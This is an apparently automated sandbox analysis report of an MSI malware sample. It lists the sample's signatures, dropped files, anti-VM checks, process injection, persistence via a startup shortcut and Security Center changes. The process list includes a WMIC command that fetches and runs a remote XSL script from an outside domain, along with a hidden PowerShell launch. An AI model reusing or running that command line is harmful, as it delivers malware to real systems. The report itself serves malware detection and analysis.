Analysis
- max time kernel: 130s
- max time network: 149s
- resource: win10v191014

Task | Sample | Resource
task1 | 0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc | win7v191014
task2 | 0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc | win10v191014
task3 | 0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc | win7v191014
task4 | 0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc | win10v191014
task5 | 91B5DB3C0CCBD68BD04C24571E27F99D.msi | win7v191014
task6 | 91B5DB3C0CCBD68BD04C24571E27F99D.msi | win10v191014
task7 | ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | win7v191014
task8 | ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe | win10v191014
task9 | fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe | win7v191014
task10 | fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe | win10v191014
General
- Target: Supergevaarlijkk.zip
- Sample: 191029-7v9yqqxm3n
- SHA256: 6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac
Malware Config
Signatures
Checks processor name in registry (likely anti-VM) 2 TTPs 1 IoCs
description | ioc | pid | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 4568 | WerFault.exe
Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
4936 | msiexec.exe
Suspicious use of AdjustPrivilegeToken 58 IoCs
description | pid | Process
Token: SeShutdownPrivilege | 4936 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 4936 | msiexec.exe
Token: SeSecurityPrivilege | 5068 | msiexec.exe
Token: SeCreateTokenPrivilege | 4936 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 4936 | msiexec.exe
Token: SeLockMemoryPrivilege | 4936 | msiexec.exe
Token: SeMachineAccountPrivilege | 4936 | msiexec.exe
Token: SeTcbPrivilege | 4936 | msiexec.exe
Token: SeSecurityPrivilege | 4936 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 4936 | msiexec.exe
Token: SeLoadDriverPrivilege | 4936 | msiexec.exe
Token: SeSystemProfilePrivilege | 4936 | msiexec.exe
Token: SeSystemtimePrivilege | 4936 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 4936 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 4936 | msiexec.exe
Token: SeCreatePagefilePrivilege | 4936 | msiexec.exe
Token: SeCreatePermanentPrivilege | 4936 | msiexec.exe
Token: SeBackupPrivilege | 4936 | msiexec.exe
Token: SeRestorePrivilege | 4936 | msiexec.exe
Token: SeDebugPrivilege | 4936 | msiexec.exe
Token: SeAuditPrivilege | 4936 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 4936 | msiexec.exe
Token: SeChangeNotifyPrivilege | 4936 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 4936 | msiexec.exe
Token: SeUndockPrivilege | 4936 | msiexec.exe
Token: SeSyncAgentPrivilege | 4936 | msiexec.exe
Token: SeEnableDelegationPrivilege | 4936 | msiexec.exe
Token: SeManageVolumePrivilege | 4936 | msiexec.exe
Token: SeImpersonatePrivilege | 4936 | msiexec.exe
Token: SeCreateGlobalPrivilege | 4936 | msiexec.exe
Token: SeRestorePrivilege | 5068 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 5068 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 3784 | WMIC.exe
Token: SeSecurityPrivilege | 3784 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 3784 | WMIC.exe
Token: SeLoadDriverPrivilege | 3784 | WMIC.exe
Token: SeSystemProfilePrivilege | 3784 | WMIC.exe
Token: SeSystemtimePrivilege | 3784 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 3784 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 3784 | WMIC.exe
Token: SeCreatePagefilePrivilege | 3784 | WMIC.exe
Token: SeBackupPrivilege | 3784 | WMIC.exe
Token: SeRestorePrivilege | 3784 | WMIC.exe
Token: SeShutdownPrivilege | 3784 | WMIC.exe
Token: SeDebugPrivilege | 3784 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 3784 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 3784 | WMIC.exe
Token: SeUndockPrivilege | 3784 | WMIC.exe
Token: SeManageVolumePrivilege | 3784 | WMIC.exe
Token: 33 | 3784 | WMIC.exe
Token: 34 | 3784 | WMIC.exe
Token: 35 | 3784 | WMIC.exe
Token: 36 | 3784 | WMIC.exe
Token: SeDebugPrivilege | 4604 | powershell.exe
Token: SeRestorePrivilege | 4568 | WerFault.exe
Token: SeBackupPrivilege | 4568 | WerFault.exe
Token: SeDebugPrivilege | 4568 | WerFault.exe
Token: SeSystemEnvironmentPrivilege | 4668 | svchost.exe
Drops file in system dir 40 IoCs
description | ioc | pid | Process
File created | C:\Windows\Installer\9579.msi | 5068 | msiexec.exe
File opened for modification | C:\Windows\Installer\9579.msi | 5068 | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | 5068 | msiexec.exe
File created (read-only) | C:\Windows\Installer\MSIAD85.tmp | 5068 | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAD85.tmp | 5068 | msiexec.exe
File deleted | C:\Windows\Installer\MSIAD85.tmp | 5068 | msiexec.exe
File created (read-only) | C:\Windows\Installer\MSIB76A.tmp | 5068 | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIB76A.tmp | 5068 | msiexec.exe
File deleted | C:\Windows\Installer\MSIB76A.tmp | 5068 | msiexec.exe
File created (read-only) | C:\Windows\Installer\MSIC0A2.tmp | 5068 | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC0A2.tmp | 5068 | msiexec.exe
File deleted | C:\Windows\Installer\MSIC0A2.tmp | 5068 | msiexec.exe
File created (read-only) | C:\Windows\Installer\MSIC5D3.tmp | 5068 | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC5D3.tmp | 5068 | msiexec.exe
File deleted | C:\Windows\Installer\MSIC5D3.tmp | 5068 | msiexec.exe
File opened for modification | C:\Windows\Installer\ | 5068 | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DFA16CD51B04584168.TMP | 5068 | msiexec.exe
File created | C:\Windows\Installer\SourceHash{B7E63CAC-805B-4255-A63C-38D579B3EEAB} | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DFE2E8EB85B1747B89.TMP | 5068 | msiexec.exe
File created (read-only) | C:\Windows\Installer\MSIC864.tmp | 5068 | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC864.tmp | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DF4B61673330EC74D5.TMP | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DFF6F148A4C935344E.TMP | 5068 | msiexec.exe
File deleted | C:\Windows\Installer\MSIC864.tmp | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DFAC2F3A1EF47E3525.TMP | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DFFFD104EBFAB5F9A1.TMP | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DF58873D9B0BD93ED3.TMP | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DF195997050EAE7974.TMP | 5068 | msiexec.exe
File deleted | C:\Windows\Installer\9579.msi | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DF99D98093284899D6.TMP | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DFAF927D6069972A36.TMP | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DF6045623F078ABCB7.TMP | 5068 | msiexec.exe
File created | C:\Windows\TEMP\~DF0C6D0569BCEEB1EB.TMP | 5068 | msiexec.exe
File deleted | C:\Windows\Installer\inprogressinstallinfo.ipi | 5068 | msiexec.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | 4608 | svchost.exe
File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp | 4608 | svchost.exe
File created | C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp | 4608 | svchost.exe
File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp | 4608 | svchost.exe
File created | C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp | 4608 | svchost.exe
Drops startup file 1 IoCs
description | ioc | pid | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk | 4604 | powershell.exe
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 4568 created 712 | 4568 | WerFault.exe | 87
Modifies system certificate store 4 IoCs
description | ioc | pid | Process
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\0217922CA1B6F0BD0F1D7FF6E7BDC29B2FAAA060 | 4652 | svchost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\0217922CA1B6F0BD0F1D7FF6E7BDC29B2FAAA060\Blob = 0300000001000000140000000217922ca1b6f0bd0f1d7ff6e7bdc29b2faaa06020000000010000001e0300003082031a308202daa003020102020900bebbcc34c2a99a43300906072a8648ce38040330233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579301e170d3133303730323231313033375a170d3138303730313231313033375a30233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579308201b63082012b06072a8648ce3804013082011e02818100f3e2f36f1d350881275aa7c5f7e8c357a650ef20dc32b53ca779842dcbfc152228c1e764019c55ca7bf8a0116ccca93636dc681161c8188f79f985cce6b1a8aaf44dffd3ea6c2d60fd80eefd084c4a09c4b9784cf3ccf638ca8cca937fbaee6d472cad4ee2d5ddda4e653184e512d9846c770abdc5e4945ce5686c513bf38f150215009fd788154563df5ca8c78a354278fc70394e37fb0281803a769d0b37f784c6f1af668ffa7b2d0b53debfac0e64db8244f4c1793e9e34cac020047d3df0563ddefd171ab2fd6af49f7d3616c285cc422590c3a6f0cae0dd3987c3f310a5efe0f127f406416e983ec649e835e1006e2fccf48474b90e82cb67cb62608ed42f2ec45b71803d63dbd63101b8a490fd1ab091976ef4bb176a65038184000281806ed2b8b1d12b8846c32236833769cb554bcd3809bfd684c8bdacfb500ca500327185560ccc83d9ae13580fa72aa9fd36eccaa9fd79861245cc591b4e7dcf047847e82d5946829638473927236142f9aa5d99ec33714677492e39784264f486ada6b028837db599a58e512e376c52470b1cb8991793783499e772de6678db2be3a38198308195301d0603551d0e0416041446d2c25b3e033423792e171c0019284c71102b6430530603551d23044c304a801446d2c25b3e033423792e171c0019284c71102b64a127a42530233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579820900bebbcc34c2a99a4330120603551d130101ff040830060101ff020100300b0603551d0f0404030201c6300906072a8648ce380403032f00302c02140b7937349b7de4b8750855cd40ef4bbb2d3145a9021417408a13071294c11b2c9e5195e411eb86a54864 | 4652 | svchost.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6 | 4652 | svchost.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6\Blob = 0300000001000000140000002c85006a1a028bcc349df23c474724c055fde8b620000000010000001f0300003082031b308202dba003020102020900bea900b78b6470ef300906072a8648ce38040330233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579301e170d3136303530393230343035355a170d3231303530383230343035355a30233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579308201b73082012c06072a8648ce3804013082011f02818100a9a733a14a9c9d68b075811ddf231c514c0cdc328087287fd11f1d6eb125b536b88cd5579591bb6e7545b45b98eaa8cdeb0ae38be4781c7d36d97b3d2bb45b9449142130f68e112c6d09e343160cd0d0fbb8aabc8b0cea5b2066b0e3368589dadfd8ae79e9d2bdc5f5836d8fb278be02c260d3a592bda471f1a28e2f925e8b57021500a86236ce56c046d8f3fac8a6bb63e28543e45753028181009eb2085cfbe32af5a25dddeebdeede0d2f2a4475bbca802c7952e078421b4b85528fff6242aba7c75c1e40695db3be422d982972b638679c1b9314a39cad44577d2a71ee3e5738176062d9200be5efcc1b00c16b1b48e8b1771c01b9aa54ce0b5f6679caed531293d92ef822695e20264e23b188489ea3e6dc1c36a90fa0668903818400028180168cdc3d074cf4c9accef116317b85adf100f2454c9ca23203ad296928bb08879c48096c44bcb0dc3f49f69456e871dd45980eacabe735c63ade0281e7a48aca3eabde71aab64c04a6ef72c352be936692c8970a3c7615370d549b931c289810278f5284914f6965df0d93ce0a980ca5dce26e75a331c4da939af3e051d252d3a38198308195301d0603551d0e04160414a353ea5503cd0a69c45870b6ffe3912091c79f7a30530603551d23044c304a8014a353ea5503cd0a69c45870b6ffe3912091c79f7aa127a42530233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579820900bea900b78b6470ef30120603551d130101ff040830060101ff020100300b0603551d0f0404030201c6300906072a8648ce380403032f00302c021468e7a7cdfca81ff04d476fa11b781b7696d1fbf402145ef1c64374ebde4c309b59a9deeb99e556fd1477 | 4652 | svchost.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid | Process
5068 | msiexec.exe
4604 | powershell.exe
4568 | WerFault.exe
4836 | svchost.exe
Uses Volume Shadow Copy WMI provider 3 IoCs
description | ioc | pid | Process
Key opened | \Registry\Machine\Software\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C} | 4604 | powershell.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C} | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} | 4604 | powershell.exe
Uses Volume Shadow Copy Service COM API 3 IoCs
description | ioc | pid | Process
Key opened | \Registry\Machine\Software\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623} | 4604 | powershell.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623} | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} | 4604 | powershell.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 4836 created 712 | 4836 | svchost.exe | 87
Program crash 1 IoCs
pid | Process
4568 | WerFault.exe
Discovering connected drives 3 TTPs 1 IoCs
description | ioc | pid | Process
File opened (read-only) | \??\C: | 4936 | msiexec.exe
Suspicious use of WriteProcessMemory 9 IoCs
description | pid | Process | procid_target
PID 5068 wrote to memory of 68 | 5068 | msiexec.exe | 75
PID 68 wrote to memory of 3784 | 68 | MsiExec.exe | 77
PID 5068 wrote to memory of 3756 | 5068 | msiexec.exe | 79
PID 3784 wrote to memory of 4604 | 3784 | WMIC.exe | 80
PID 3756 wrote to memory of 4672 | 3756 | MsiExec.exe | 82
PID 3520 wrote to memory of 2992 | 3520 | SppExtComObj.exe | 84
PID 4604 wrote to memory of 4864 | 4604 | powershell.exe | 86
PID 4864 wrote to memory of 712 | 4864 | nvsmartmaxapp.exe | 87
PID 4836 wrote to memory of 4568 | 4836 | svchost.exe | 89
Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs
description | ioc | pid | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | 4568 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | 4568 | WerFault.exe
Windows security modification 2 IoCs
description | ioc | pid | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" | 2232 | svchost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" | 2232 | svchost.exe
Loads dropped DLL 3 IoCs
pid | Process
3756 | MsiExec.exe
4864 | nvsmartmaxapp.exe
712 | wmplayer.exe
Executes dropped EXE 2 IoCs
pid | Process
4672 | lcC0B0.tmp
4864 | nvsmartmaxapp.exe
Uses Task Scheduler COM API 1 TTPs 19 IoCs
description | ioc | pid | Process
Key opened | \Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} | 4604 | powershell.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs | 4604 | powershell.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 | 4604 | powershell.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 | 4604 | powershell.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\InprocServer32 | 4604 | powershell.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\ | 4604 | powershell.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\ThreadingModel | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler | 4604 | powershell.exe
Key opened | \Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 | 4604 | powershell.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\Class | 4604 | powershell.exe
Key opened | \Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32 | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 | 4604 | powershell.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\AppID | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer | 4604 | powershell.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation | 4604 | powershell.exe
Checks system information in the registry (likely anti-VM) 2 TTPs 4 IoCs
description | ioc | pid | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | 4568 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | 4568 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | 4212 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | 4212 | svchost.exe
Checks SCSI registry key(s) (likely anti-VM) 3 TTPs 12 IoCs
description | ioc | pid | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | 4652 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | 4652 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | 4652 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 | 4652 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | 4652 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | 4652 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | 4668 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | 4668 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | 4668 | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 | 4668 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | 4668 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | 4668 | svchost.exe
Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | pid | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | 4568 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | 4568 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | 4568 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | 4568 | WerFault.exe
Processes
Path: C:\Windows\system32\msiexec.exe
Command line: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
PID: 4936

Path: \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
PID: 5056

Path: C:\Windows\system32\msiexec.exe
Command line: C:\Windows\system32\msiexec.exe /V
- Suspicious use of AdjustPrivilegeToken
- Drops file in system dir
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID: 5068

Path: C:\Windows\system32\svchost.exe
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
PID: 5116

Path: C:\Windows\System32\MsiExec.exe
Command line: C:\Windows\System32\MsiExec.exe -Embedding 22B17CD028F8275C8F6FA32DFD50D401
- Suspicious use of WriteProcessMemory
PID: 68

Path: C:\Windows\System32\Wbem\WMIC.exe
Command line: "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3784

Path: C:\Windows\syswow64\MsiExec.exe
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 7FE29F02F3E2E41078CB647856D8204D
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
PID: 3756

Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
- Suspicious use of AdjustPrivilegeToken
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Uses Volume Shadow Copy WMI provider
- Uses Volume Shadow Copy Service COM API
- Suspicious use of WriteProcessMemory
- Uses Task Scheduler COM API
PID: 4604

Path: C:\Users\Admin\AppData\Local\Temp\lcC0B0.tmp
Command line: "C:\Users\Admin\AppData\Local\Temp\lcC0B0.tmp"
- Executes dropped EXE
PID: 4672

Path: C:\Windows\system32\SppExtComObj.exe
Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
- Suspicious use of WriteProcessMemory
PID: 3520

Path: C:\Windows\System32\SLUI.exe
Command line: "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
PID: 2992

Path: C:\Users\Admin\AppData\Roaming\SvTBPrJ\nvsmartmaxapp.exe
Command line: "C:\Users\Admin\AppData\Roaming\SvTBPrJ\nvsmartmaxapp.exe"
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Executes dropped EXE
PID: 4864

Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Command line: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
- Loads dropped DLL
PID: 712

Path: C:\Windows\System32\svchost.exe
Command line: C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID: 4836

Path: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 712 -s 652
- Checks processor name in registry (likely anti-VM)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Checks processor information in registry (likely anti-VM)
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
PID: 4568

Path: \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
- Modifies system certificate store
- Checks SCSI registry key(s) (likely anti-VM)
PID: 4652

Path: C:\Windows\System32\svchost.exe
Command line: C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
- Suspicious use of AdjustPrivilegeToken
- Checks SCSI registry key(s) (likely anti-VM)
PID: 4668

Path: \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k netsvcs -s wisvc
PID: 3444

Path: \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k netsvcs -s BITS
- Drops file in system dir
PID: 4608

Path: \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
PID: 2028

Path: \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
- Checks system information in the registry (likely anti-VM)
PID: 4212

Path: \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k unistacksvcgroup
PID: 2128

Path: \??\c:\windows\system32\svchost.exe
Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
- Windows security modification
PID: 2232
Network
MITRE ATT&CK Enterprise v15
MITRE ATT&CK Additional techniques
- T1130
- T1089